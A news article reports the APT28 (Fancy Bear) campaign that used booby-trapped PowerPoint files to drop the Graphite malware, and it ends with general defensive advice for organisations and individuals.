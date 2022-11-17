- Advertisement -

A cybercriminal linked to the Russian state, known as Fancy Bear -although he is also known by other names, such as APT28, Pawn Storm or Tsar Team- has put national security services and anonymous citizens around the world in check with an online scam that uses a widely used program such as Power Point to deceive users and make them fall into its trap.

Cybercriminals mainly target users related to security and governments

The scam exploits mouse movement on cheat Microsoft Power Point documents to install viruses and malware on both corporate computers and personal user computers. This happens as soon as the user starts PowerPoint presentation mode and makes any mouse movement in the document.

The cybercriminal attacks all types of users, but one of the primary targets of the scam are entities and professionals working in the defense and government sectors of the main countries of Western Europe and Eastern Europe.

To trick these users, the attack employs a cheat document that makes use of a Power Point template linked to the Organization for Economic Co-operation and Development (OECD).

As the cybersecurity company Nunsys has pointed out, the operation of the scam is as follows: the malware executes a PowerShell script, which downloads and activates a “dropper” from the OneDrive storage solution.

Said “dropper”, a seemingly innocuous image file, functions as a way to embed a persistent file or “payload”, a variant of malware known as Graphite, which uses the Microsoft Graph API and OneDrive for command and control (C&C) communications. ) to obtain information.

Given that the URLs used in the most recent attacks appeared active in the months of August and September of the year -although threats have been found since last January- it is more than possible that more attacks are taking place today.

For this reason, it is necessary to exercise extreme caution, not only among those professionals in the defense and government sectors, but it is also important not to neglect surveillance in other types of industries and even on a personal level, since Power Point is a widely used tool. by all companies, from all sectors, and by users at a private level.

At a corporate level, having EDR tools (endpoint detection and response, that is, the employee’s computer device) to monitor traffic between devices and the network and protect the workplace is essential.

In the same way, it is necessary to prohibit the use of macros in office documents that come from unreliable sources and disable the command line (“powershell”) in user profiles that do not require it.

Having the latest security patches of the operating system used, always using its latest version, as well as ensuring the backup system and having a reliable firewall is essential to protect yourself from the Russian PowerPoint cyber-scam.